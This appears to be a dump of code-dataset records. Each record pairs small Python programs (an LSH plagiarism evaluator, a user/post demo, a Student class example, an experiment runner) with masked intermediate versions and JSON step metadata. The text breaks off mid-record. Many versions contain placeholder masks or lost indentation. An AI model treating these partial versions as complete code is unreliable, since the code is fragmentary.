<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _read_truthfile(filepath):
with open(filepath, 'r') as f:
truth_pairs = [tuple(sorted(line.strip().split())) for line in f]
return set(truth_pairs)
def _get_stats(candidate_pairs, truth_pairs):
tp = len(candidate_pairs.intersection(truth_pairs))
prec = 1.0 * tp / len(candidate_pairs)
rec = 1.0 * tp / len(truth_pairs)
print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(
candidate_pairs), tp, prec, rec))
return prec, rec
def run(mh, truthfile, ts):
truth_pairs = _read_truthfile(truthfile)
prec_series = []
rec_series = []
for t in ts:
print('Doing LSH with t=', t)
lsh = LSH(t)
lsh.do_lsh(mh)
candidate_pairs = set(lsh.get_candidates())
prec, rec = _get_stats(candidate_pairs, truth_pairs)
prec_series.append(prec)
rec_series.append(rec)
exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})
return exp_df
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from plagiarism_lib.article_db import ArticleDB
from plagiarism_lib.minhash import MinHash
from plagiarism_lib.lsh import LSH
import pandas as pd
import numpy as np
def _read_truthfile(filepath):
with open(filepath, 'r') as f:
truth_pairs = [tuple(sorted(line.strip().split())) for line in f]
return set(truth_pairs)
def _get_stats(candidate_pairs, truth_pairs):
tp = len(candidate_pairs.intersection(truth_pairs))
prec = 1.0 * tp / len(candidate_pairs)
rec = 1.0 * tp / len(truth_pairs)
print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(
candidate_pairs), tp, prec, rec))
return prec, rec
def run(mh, truthfile, ts):
truth_pairs = _read_truthfile(truthfile)
prec_series = []
rec_series = []
for t in ts:
print('Doing LSH with t=', t)
lsh = LSH(t)
lsh.do_lsh(mh)
candidate_pairs = set(lsh.get_candidates())
prec, rec = _get_stats(candidate_pairs, truth_pairs)
prec_series.append(prec)
rec_series.append(rec)
exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})
return exp_df
<|reserved_special_token_1|>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 7 07:51:26 2017
@author: hcorrada
"""
from plagiarism_lib.article_db import ArticleDB
from plagiarism_lib.minhash import MinHash
from plagiarism_lib.lsh import LSH
import pandas as pd
import numpy as np
def _read_truthfile(filepath):
with open(filepath, 'r') as f:
truth_pairs = [tuple(sorted(line.strip().split()))
for line in f]
return set(truth_pairs)
def _get_stats(candidate_pairs, truth_pairs):
tp = len(candidate_pairs.intersection(truth_pairs))
prec = 1.0 * tp / len(candidate_pairs)
rec = 1.0 * tp / len(truth_pairs)
print (" returned: %d, tp=%.4f, prec=%.4f, rec=%.4f" % (len(candidate_pairs), tp, prec, rec))
return prec, rec
def run(mh, truthfile, ts):
truth_pairs = _read_truthfile(truthfile)
prec_series = []
rec_series = []
for t in ts:
print("Doing LSH with t=", t)
lsh = LSH(t)
lsh.do_lsh(mh)
candidate_pairs = set(lsh.get_candidates())
prec, rec = _get_stats(candidate_pairs, truth_pairs)
prec_series.append(prec)
rec_series.append(rec)
exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})
return exp_df
|
flexible
|
{
"blob_id": "18b73a06c80272aff5c0e4b10473e95bd58466f3",
"index": 1197,
"step-1": "<mask token>\n\n\ndef _get_stats(candidate_pairs, truth_pairs):\n tp = len(candidate_pairs.intersection(truth_pairs))\n prec = 1.0 * tp / len(candidate_pairs)\n rec = 1.0 * tp / len(truth_pairs)\n print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(\n candidate_pairs), tp, prec, rec))\n return prec, rec\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _read_truthfile(filepath):\n with open(filepath, 'r') as f:\n truth_pairs = [tuple(sorted(line.strip().split())) for line in f]\n return set(truth_pairs)\n\n\ndef _get_stats(candidate_pairs, truth_pairs):\n tp = len(candidate_pairs.intersection(truth_pairs))\n prec = 1.0 * tp / len(candidate_pairs)\n rec = 1.0 * tp / len(truth_pairs)\n print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(\n candidate_pairs), tp, prec, rec))\n return prec, rec\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef _read_truthfile(filepath):\n with open(filepath, 'r') as f:\n truth_pairs = [tuple(sorted(line.strip().split())) for line in f]\n return set(truth_pairs)\n\n\ndef _get_stats(candidate_pairs, truth_pairs):\n tp = len(candidate_pairs.intersection(truth_pairs))\n prec = 1.0 * tp / len(candidate_pairs)\n rec = 1.0 * tp / len(truth_pairs)\n print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(\n candidate_pairs), tp, prec, rec))\n return prec, rec\n\n\ndef run(mh, truthfile, ts):\n truth_pairs = _read_truthfile(truthfile)\n prec_series = []\n rec_series = []\n for t in ts:\n print('Doing LSH with t=', t)\n lsh = LSH(t)\n lsh.do_lsh(mh)\n candidate_pairs = set(lsh.get_candidates())\n prec, rec = _get_stats(candidate_pairs, truth_pairs)\n prec_series.append(prec)\n rec_series.append(rec)\n exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})\n return exp_df\n",
"step-4": "<mask token>\nfrom plagiarism_lib.article_db import ArticleDB\nfrom plagiarism_lib.minhash import MinHash\nfrom plagiarism_lib.lsh import LSH\nimport pandas as pd\nimport numpy as np\n\n\ndef _read_truthfile(filepath):\n with open(filepath, 'r') as f:\n truth_pairs = [tuple(sorted(line.strip().split())) for line in f]\n return set(truth_pairs)\n\n\ndef _get_stats(candidate_pairs, truth_pairs):\n tp = len(candidate_pairs.intersection(truth_pairs))\n prec = 1.0 * tp / len(candidate_pairs)\n rec = 1.0 * tp / len(truth_pairs)\n print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(\n candidate_pairs), tp, prec, rec))\n return prec, rec\n\n\ndef run(mh, truthfile, ts):\n truth_pairs = _read_truthfile(truthfile)\n prec_series = []\n rec_series = []\n for t in ts:\n print('Doing LSH with t=', t)\n lsh = LSH(t)\n lsh.do_lsh(mh)\n candidate_pairs = set(lsh.get_candidates())\n prec, rec = _get_stats(candidate_pairs, truth_pairs)\n prec_series.append(prec)\n rec_series.append(rec)\n exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})\n return exp_df\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 7 07:51:26 2017\n\n@author: hcorrada\n\"\"\"\n\nfrom plagiarism_lib.article_db import ArticleDB\nfrom plagiarism_lib.minhash import MinHash\nfrom plagiarism_lib.lsh import LSH\n\nimport pandas as pd\nimport numpy as np\n\ndef _read_truthfile(filepath):\n with open(filepath, 'r') as f:\n truth_pairs = [tuple(sorted(line.strip().split()))\n for line in f]\n return set(truth_pairs)\n\ndef _get_stats(candidate_pairs, truth_pairs):\n tp = len(candidate_pairs.intersection(truth_pairs)) \n prec = 1.0 * tp / len(candidate_pairs)\n rec = 1.0 * tp / len(truth_pairs)\n print (\" returned: %d, tp=%.4f, prec=%.4f, rec=%.4f\" % (len(candidate_pairs), tp, prec, rec))\n return prec, rec\n\ndef run(mh, truthfile, ts):\n truth_pairs = _read_truthfile(truthfile)\n \n prec_series = []\n rec_series = []\n \n for t in ts:\n print(\"Doing LSH with t=\", t) \n lsh = LSH(t)\n lsh.do_lsh(mh)\n \n candidate_pairs = set(lsh.get_candidates())\n prec, rec = _get_stats(candidate_pairs, truth_pairs) \n prec_series.append(prec)\n rec_series.append(rec)\n \n exp_df = pd.DataFrame({'t': ts, 'prec': prec_series, 'rec': rec_series})\n \n return exp_df",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app_user_one.get_user_info()
app_user_one.change_status('in job market')
app_user_one.get_user_info()
<|reserved_special_token_0|>
app_user_two.get_user_info()
<|reserved_special_token_0|>
new_post.get_post_info()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app_user_one = user.User('rr@gg.com', 'Riks R', 'ppp1', 'student')
app_user_one.get_user_info()
app_user_one.change_status('in job market')
app_user_one.get_user_info()
app_user_two = user.User('z43@gg.com', 'Bobby L', 'zz1', 'student')
app_user_two.get_user_info()
new_post = Post('Going for it', app_user_two.name)
new_post.get_post_info()
<|reserved_special_token_1|>
import user
from post import Post
app_user_one = user.User('rr@gg.com', 'Riks R', 'ppp1', 'student')
app_user_one.get_user_info()
app_user_one.change_status('in job market')
app_user_one.get_user_info()
app_user_two = user.User('z43@gg.com', 'Bobby L', 'zz1', 'student')
app_user_two.get_user_info()
new_post = Post('Going for it', app_user_two.name)
new_post.get_post_info()
<|reserved_special_token_1|>
import user
# or from user import User
from post import Post
app_user_one = user.User("rr@gg.com", "Riks R", "ppp1", "student")
app_user_one.get_user_info()
app_user_one.change_status("in job market")
app_user_one.get_user_info()
app_user_two = user.User("z43@gg.com", "Bobby L", "zz1", "student")
app_user_two.get_user_info()
new_post = Post("Going for it", app_user_two.name)
new_post.get_post_info()
|
flexible
|
{
"blob_id": "f59db28b669a41051cc6d0d4b8e14d1c7b0edd11",
"index": 2555,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp_user_one.get_user_info()\napp_user_one.change_status('in job market')\napp_user_one.get_user_info()\n<mask token>\napp_user_two.get_user_info()\n<mask token>\nnew_post.get_post_info()\n",
"step-3": "<mask token>\napp_user_one = user.User('rr@gg.com', 'Riks R', 'ppp1', 'student')\napp_user_one.get_user_info()\napp_user_one.change_status('in job market')\napp_user_one.get_user_info()\napp_user_two = user.User('z43@gg.com', 'Bobby L', 'zz1', 'student')\napp_user_two.get_user_info()\nnew_post = Post('Going for it', app_user_two.name)\nnew_post.get_post_info()\n",
"step-4": "import user\nfrom post import Post\napp_user_one = user.User('rr@gg.com', 'Riks R', 'ppp1', 'student')\napp_user_one.get_user_info()\napp_user_one.change_status('in job market')\napp_user_one.get_user_info()\napp_user_two = user.User('z43@gg.com', 'Bobby L', 'zz1', 'student')\napp_user_two.get_user_info()\nnew_post = Post('Going for it', app_user_two.name)\nnew_post.get_post_info()\n",
"step-5": "import user\n\n# or from user import User\nfrom post import Post\napp_user_one = user.User(\"rr@gg.com\", \"Riks R\", \"ppp1\", \"student\")\napp_user_one.get_user_info()\napp_user_one.change_status(\"in job market\")\napp_user_one.get_user_info()\n\n\napp_user_two = user.User(\"z43@gg.com\", \"Bobby L\", \"zz1\", \"student\")\napp_user_two.get_user_info()\n\nnew_post = Post(\"Going for it\", app_user_two.name)\nnew_post.get_post_info()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
my_list = [9, 9, 9, 8, 8, 7, 7, 6, 6, 5, 4, 4, 4, 2, 2, 1]
new_num = int(input('Enter a new number - '))
i = 0
for n in my_list:
if new_num <= n:
i += 1
my_list.insert(i, float(new_num))
print(my_list)
|
normal
|
{
"blob_id": "be16e13c0e03952e45f98b175975795bba19cf9a",
"index": 2775,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor n in my_list:\n if new_num <= n:\n i += 1\nmy_list.insert(i, float(new_num))\nprint(my_list)\n",
"step-3": "my_list = [9, 9, 9, 8, 8, 7, 7, 6, 6, 5, 4, 4, 4, 2, 2, 1]\nnew_num = int(input('Enter a new number - '))\ni = 0\nfor n in my_list:\n if new_num <= n:\n i += 1\nmy_list.insert(i, float(new_num))\nprint(my_list)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
class Student(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def full_name(self):
return '{} {}'.format(self._first_name, self._last_name)
def detail_info(self):
return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,
self.full_name(), self._email, self._grade, self._tuition, self
._gpa)
<|reserved_special_token_0|>
def get_fee_culc(self):
return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition * Student.tuition_per)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@classmethod
def student_const(cls, id, first_name, last_name, email, grade, tuition,
gpa):
return cls(id, first_name, last_name, email, grade, tuition * cls.
tuition_per, gpa)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Student(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def full_name(self):
return '{} {}'.format(self._first_name, self._last_name)
def detail_info(self):
return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,
self.full_name(), self._email, self._grade, self._tuition, self
._gpa)
def get_fee(self):
return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition)
def get_fee_culc(self):
return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition * Student.tuition_per)
def __str__(self):
return 'Student Info - > name: {} grade: {} email: {}'.format(self.
full_name(), self._grade, self._email)
<|reserved_special_token_0|>
@classmethod
def student_const(cls, id, first_name, last_name, email, grade, tuition,
gpa):
return cls(id, first_name, last_name, email, grade, tuition * cls.
tuition_per, gpa)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Student(object):
<|reserved_special_token_0|>
tuition_per = 1.0
def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):
self._id = id
self._first_name = first_name
self._last_name = last_name
self._email = email
self._grade = grade
self._tuition = tuition
self._gpa = gpa
def full_name(self):
return '{} {}'.format(self._first_name, self._last_name)
def detail_info(self):
return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,
self.full_name(), self._email, self._grade, self._tuition, self
._gpa)
def get_fee(self):
return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition)
def get_fee_culc(self):
return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition * Student.tuition_per)
def __str__(self):
return 'Student Info - > name: {} grade: {} email: {}'.format(self.
full_name(), self._grade, self._email)
@classmethod
def raise_fee(cls, per):
if per <= 1:
print('Please Enter 1 or More')
cls.tuition_per = per
print('Succed! tuiton increased')
@classmethod
def student_const(cls, id, first_name, last_name, email, grade, tuition,
gpa):
return cls(id, first_name, last_name, email, grade, tuition * cls.
tuition_per, gpa)
@staticmethod
def is_scholarship_st(inst):
if inst._gpa >= 4.3:
return '{} is a scholarship recipient.'.format(inst._last_name)
return 'Sorry. Not a scholarship recipient'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Student(object):
"""
Student Class
Author : Kim
Date : 2020.11.07
Description : Class, Static, Instance Method
"""
tuition_per = 1.0
def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):
self._id = id
self._first_name = first_name
self._last_name = last_name
self._email = email
self._grade = grade
self._tuition = tuition
self._gpa = gpa
def full_name(self):
return '{} {}'.format(self._first_name, self._last_name)
def detail_info(self):
return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,
self.full_name(), self._email, self._grade, self._tuition, self
._gpa)
def get_fee(self):
return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition)
def get_fee_culc(self):
return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition * Student.tuition_per)
def __str__(self):
return 'Student Info - > name: {} grade: {} email: {}'.format(self.
full_name(), self._grade, self._email)
@classmethod
def raise_fee(cls, per):
if per <= 1:
print('Please Enter 1 or More')
cls.tuition_per = per
print('Succed! tuiton increased')
@classmethod
def student_const(cls, id, first_name, last_name, email, grade, tuition,
gpa):
return cls(id, first_name, last_name, email, grade, tuition * cls.
tuition_per, gpa)
@staticmethod
def is_scholarship_st(inst):
if inst._gpa >= 4.3:
return '{} is a scholarship recipient.'.format(inst._last_name)
return 'Sorry. Not a scholarship recipient'
<|reserved_special_token_0|>
def is_scholarship(inst):
if inst._gpa >= 4.3:
return '{} is a scholarship recipient.'.format(inst._last_name)
return 'Sorry. Not a scholarship recipient'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#파이썬 심화
#클래스 메소드, 인스턴스 메소드, 스테이틱 메소드
# 기본 인스턴스 메소드
class Student(object):
"""
Student Class
Author : Kim
Date : 2020.11.07
Description : Class, Static, Instance Method
"""
#Class Variable
tuition_per = 1.0
def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):
self._id = id
self._first_name = first_name
self._last_name = last_name
self._email = email
self._grade = grade
self._tuition = tuition
self._gpa = gpa
# Instance Method
def full_name(self):
return '{} {}'.format(self._first_name, self._last_name)
# Instance Method
def detail_info(self):
return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id, self.full_name(), self._email, self._grade, self._tuition, self._gpa)
# Instance Method
def get_fee(self):
return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self._tuition)
# Instance Method
def get_fee_culc(self):
return 'After tuition -> Id: {}, fee: {}'.format(self._id, self._tuition*Student.tuition_per)
def __str__(self):
return 'Student Info - > name: {} grade: {} email: {}'.format(self.full_name(), self._grade, self._email)
#Class Method
@classmethod
def raise_fee(cls, per):
if per <= 1:
print('Please Enter 1 or More')
cls.tuition_per = per
print('Succed! tuiton increased')
#Class Method
@classmethod
def student_const(cls, id, first_name, last_name, email, grade, tuition, gpa):
return cls(id, first_name, last_name, email, grade, tuition * cls.tuition_per, gpa)
#Static Method
@staticmethod
def is_scholarship_st(inst):
if inst._gpa >= 4.3:
return '{} is a scholarship recipient.'.format(inst._last_name)
return "Sorry. Not a scholarship recipient"
#학생 인스턴스
student_1 = Student(1, "Kim", 'Sarang', 'student1@naver.com', '1', 400, 3.5)
student_2 = Student(2, "Lee", 'Myungho', 'student2@daum.net', '2', 500, 4.3)
# 기본 정보
print(student_1)
print(student_2)
print()
#전체 정보
print(student_1.detail_info())
print(student_2.detail_info())
#학비 정보(인상전)
print(student_1.get_fee())
print(student_2.get_fee())
#학비 인상 (클래스 매소드 미사용)
# Student.tuition_per = 1.2
#학비 인상 (클래스 매소드 사용)
Student.raise_fee(1.5)
#학비 정보(인상후)
print(student_1.get_fee_culc())
print(student_2.get_fee_culc())
# 클래스 메소드 인스턴스 생성 실습
student_3 = Student.student_const(3, 'Park', 'Minji', 'Student3@gmail.com', '3', 550, 4.5)
student_4 = Student.student_const(4, 'Cho', 'Sunghan', 'Student4@gmail.com', '4', 6000, 4.1)
# 전체 정보
print(student_3.detail_info())
print(student_4.detail_info())
print()
#학생 학비 변경 확인
print(student_3._tuition)
print(student_4._tuition)
print()
# 장학금 혜택 여부(스테이틱 메소드 미사용)
def is_scholarship(inst):
if inst._gpa >= 4.3:
return '{} is a scholarship recipient.'.format(inst._last_name)
return "Sorry. Not a scholarship recipient"
print(is_scholarship(student_1))
print(is_scholarship(student_2))
print(is_scholarship(student_3))
print(is_scholarship(student_4))
print()
# 장학금 혜택 여부(스테이틱 메소드 사용)
print(Student.is_scholarship_st(student_1))
print(Student.is_scholarship_st(student_2))
print(Student.is_scholarship_st(student_3))
print(Student.is_scholarship_st(student_4))
print()
print(student_1.is_scholarship_st(student_1))
print(student_2.is_scholarship_st(student_2))
print(student_3.is_scholarship_st(student_3))
print(student_4.is_scholarship_st(student_4))
|
flexible
|
{
"blob_id": "f507fbe7c92134c0a7149aafe7de88debebd42f5",
"index": 7760,
"step-1": "class Student(object):\n <mask token>\n <mask token>\n <mask token>\n\n def full_name(self):\n return '{} {}'.format(self._first_name, self._last_name)\n\n def detail_info(self):\n return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,\n self.full_name(), self._email, self._grade, self._tuition, self\n ._gpa)\n <mask token>\n\n def get_fee_culc(self):\n return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition * Student.tuition_per)\n <mask token>\n <mask token>\n\n @classmethod\n def student_const(cls, id, first_name, last_name, email, grade, tuition,\n gpa):\n return cls(id, first_name, last_name, email, grade, tuition * cls.\n tuition_per, gpa)\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Student(object):\n <mask token>\n <mask token>\n <mask token>\n\n def full_name(self):\n return '{} {}'.format(self._first_name, self._last_name)\n\n def detail_info(self):\n return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,\n self.full_name(), self._email, self._grade, self._tuition, self\n ._gpa)\n\n def get_fee(self):\n return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition)\n\n def get_fee_culc(self):\n return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition * Student.tuition_per)\n\n def __str__(self):\n return 'Student Info - > name: {} grade: {} email: {}'.format(self.\n full_name(), self._grade, self._email)\n <mask token>\n\n @classmethod\n def student_const(cls, id, first_name, last_name, email, grade, tuition,\n gpa):\n return cls(id, first_name, last_name, email, grade, tuition * cls.\n tuition_per, gpa)\n <mask token>\n\n\n<mask token>\n",
"step-3": "class Student(object):\n <mask token>\n tuition_per = 1.0\n\n def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):\n self._id = id\n self._first_name = first_name\n self._last_name = last_name\n self._email = email\n self._grade = grade\n self._tuition = tuition\n self._gpa = gpa\n\n def full_name(self):\n return '{} {}'.format(self._first_name, self._last_name)\n\n def detail_info(self):\n return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,\n self.full_name(), self._email, self._grade, self._tuition, self\n ._gpa)\n\n def get_fee(self):\n return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition)\n\n def get_fee_culc(self):\n return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition * Student.tuition_per)\n\n def __str__(self):\n return 'Student Info - > name: {} grade: {} email: {}'.format(self.\n full_name(), self._grade, self._email)\n\n @classmethod\n def raise_fee(cls, per):\n if per <= 1:\n print('Please Enter 1 or More')\n cls.tuition_per = per\n print('Succed! tuiton increased')\n\n @classmethod\n def student_const(cls, id, first_name, last_name, email, grade, tuition,\n gpa):\n return cls(id, first_name, last_name, email, grade, tuition * cls.\n tuition_per, gpa)\n\n @staticmethod\n def is_scholarship_st(inst):\n if inst._gpa >= 4.3:\n return '{} is a scholarship recipient.'.format(inst._last_name)\n return 'Sorry. Not a scholarship recipient'\n\n\n<mask token>\n",
"step-4": "class Student(object):\n \"\"\"\n Student Class\n Author : Kim\n Date : 2020.11.07\n Description : Class, Static, Instance Method\n \"\"\"\n tuition_per = 1.0\n\n def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):\n self._id = id\n self._first_name = first_name\n self._last_name = last_name\n self._email = email\n self._grade = grade\n self._tuition = tuition\n self._gpa = gpa\n\n def full_name(self):\n return '{} {}'.format(self._first_name, self._last_name)\n\n def detail_info(self):\n return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,\n self.full_name(), self._email, self._grade, self._tuition, self\n ._gpa)\n\n def get_fee(self):\n return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition)\n\n def get_fee_culc(self):\n return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition * Student.tuition_per)\n\n def __str__(self):\n return 'Student Info - > name: {} grade: {} email: {}'.format(self.\n full_name(), self._grade, self._email)\n\n @classmethod\n def raise_fee(cls, per):\n if per <= 1:\n print('Please Enter 1 or More')\n cls.tuition_per = per\n print('Succed! tuiton increased')\n\n @classmethod\n def student_const(cls, id, first_name, last_name, email, grade, tuition,\n gpa):\n return cls(id, first_name, last_name, email, grade, tuition * cls.\n tuition_per, gpa)\n\n @staticmethod\n def is_scholarship_st(inst):\n if inst._gpa >= 4.3:\n return '{} is a scholarship recipient.'.format(inst._last_name)\n return 'Sorry. Not a scholarship recipient'\n\n\n<mask token>\n\n\ndef is_scholarship(inst):\n if inst._gpa >= 4.3:\n return '{} is a scholarship recipient.'.format(inst._last_name)\n return 'Sorry. Not a scholarship recipient'\n\n\n<mask token>\n",
"step-5": "#파이썬 심화\r\n#클래스 메소드, 인스턴스 메소드, 스테이틱 메소드\r\n\r\n# 기본 인스턴스 메소드\r\n\r\nclass Student(object):\r\n \"\"\"\r\n Student Class\r\n Author : Kim\r\n Date : 2020.11.07\r\n Description : Class, Static, Instance Method\r\n \"\"\"\r\n\r\n #Class Variable\r\n tuition_per = 1.0\r\n\r\n def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):\r\n self._id = id\r\n self._first_name = first_name\r\n self._last_name = last_name\r\n self._email = email\r\n self._grade = grade\r\n self._tuition = tuition\r\n self._gpa = gpa\r\n\r\n # Instance Method\r\n def full_name(self):\r\n return '{} {}'.format(self._first_name, self._last_name)\r\n\r\n # Instance Method\r\n def detail_info(self):\r\n return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id, self.full_name(), self._email, self._grade, self._tuition, self._gpa)\r\n \r\n # Instance Method\r\n def get_fee(self):\r\n return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self._tuition)\r\n\r\n # Instance Method\r\n def get_fee_culc(self):\r\n return 'After tuition -> Id: {}, fee: {}'.format(self._id, self._tuition*Student.tuition_per)\r\n\r\n def __str__(self):\r\n return 'Student Info - > name: {} grade: {} email: {}'.format(self.full_name(), self._grade, self._email)\r\n\r\n #Class Method\r\n @classmethod\r\n def raise_fee(cls, per):\r\n if per <= 1:\r\n print('Please Enter 1 or More')\r\n cls.tuition_per = per\r\n print('Succed! tuiton increased')\r\n\r\n #Class Method\r\n @classmethod\r\n def student_const(cls, id, first_name, last_name, email, grade, tuition, gpa):\r\n return cls(id, first_name, last_name, email, grade, tuition * cls.tuition_per, gpa)\r\n\r\n #Static Method\r\n @staticmethod\r\n def is_scholarship_st(inst):\r\n if inst._gpa >= 4.3:\r\n return '{} is a scholarship recipient.'.format(inst._last_name)\r\n return \"Sorry. Not a scholarship recipient\"\r\n\r\n \r\n\r\n#학생 인스턴스\r\nstudent_1 = Student(1, \"Kim\", 'Sarang', 'student1@naver.com', '1', 400, 3.5)\r\nstudent_2 = Student(2, \"Lee\", 'Myungho', 'student2@daum.net', '2', 500, 4.3)\r\n\r\n# 기본 정보\r\nprint(student_1)\r\nprint(student_2)\r\n\r\nprint()\r\n\r\n#전체 정보\r\nprint(student_1.detail_info())\r\nprint(student_2.detail_info())\r\n\r\n#학비 정보(인상전)\r\nprint(student_1.get_fee())\r\nprint(student_2.get_fee())\r\n\r\n#학비 인상 (클래스 매소드 미사용)\r\n# Student.tuition_per = 1.2\r\n\r\n#학비 인상 (클래스 매소드 사용)\r\nStudent.raise_fee(1.5)\r\n\r\n#학비 정보(인상후)\r\nprint(student_1.get_fee_culc())\r\nprint(student_2.get_fee_culc())\r\n\r\n# 클래스 메소드 인스턴스 생성 실습\r\nstudent_3 = Student.student_const(3, 'Park', 'Minji', 'Student3@gmail.com', '3', 550, 4.5)\r\nstudent_4 = Student.student_const(4, 'Cho', 'Sunghan', 'Student4@gmail.com', '4', 6000, 4.1)\r\n\r\n# 전체 정보\r\nprint(student_3.detail_info())\r\nprint(student_4.detail_info())\r\nprint()\r\n\r\n#학생 학비 변경 확인\r\nprint(student_3._tuition)\r\nprint(student_4._tuition)\r\nprint()\r\n\r\n# 장학금 혜택 여부(스테이틱 메소드 미사용)\r\ndef is_scholarship(inst):\r\n if inst._gpa >= 4.3:\r\n return '{} is a scholarship recipient.'.format(inst._last_name)\r\n return \"Sorry. Not a scholarship recipient\"\r\n\r\nprint(is_scholarship(student_1))\r\nprint(is_scholarship(student_2))\r\nprint(is_scholarship(student_3))\r\nprint(is_scholarship(student_4))\r\n\r\nprint()\r\n\r\n# 장학금 혜택 여부(스테이틱 메소드 사용)\r\nprint(Student.is_scholarship_st(student_1))\r\nprint(Student.is_scholarship_st(student_2))\r\nprint(Student.is_scholarship_st(student_3))\r\nprint(Student.is_scholarship_st(student_4))\r\n\r\nprint()\r\n\r\nprint(student_1.is_scholarship_st(student_1))\r\nprint(student_2.is_scholarship_st(student_2))\r\nprint(student_3.is_scholarship_st(student_3))\r\nprint(student_4.is_scholarship_st(student_4))",
"step-ids": [
5,
7,
11,
13,
16
]
}
|
[
5,
7,
11,
13,
16
] |
import sys
import os
import utils
def run(name, dim_k, dump='dump', add_cmd=''):
res = all_res[name]
model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'
cmd = f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'
print(cmd)
ret = os.system(cmd)
if ret != 0:
input('Error!!!!!!')
all_res = dict(
id_att_3='id_att_3',
id_last='id_last',
c_att_5='c_att_5',
c_last='c_last',
)
def main():
run('id_att_3', 1024, dump='dump')
run('id_last', 1024, dump='dump')
run('c_att_5', 256, dump='dump', add_cmd='-seq_length=5')
run('c_last', 256, dump='dump')
run('id_att_3', 1024, dump='dump_all', add_cmd='-skip_vali')
run('id_last', 1024, dump='dump_all', add_cmd='-skip_vali')
run('c_att_5', 256, dump='dump_all', add_cmd='-skip_vali -seq_length=5')
run('c_last', 256, dump='dump_all', add_cmd='-skip_vali')
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "548a236c4c485091d312593dcb0fa331ff98f1a8",
"index": 6359,
"step-1": "<mask token>\n\n\ndef run(name, dim_k, dump='dump', add_cmd=''):\n res = all_res[name]\n model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'\n cmd = (\n f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'\n )\n print(cmd)\n ret = os.system(cmd)\n if ret != 0:\n input('Error!!!!!!')\n\n\n<mask token>\n",
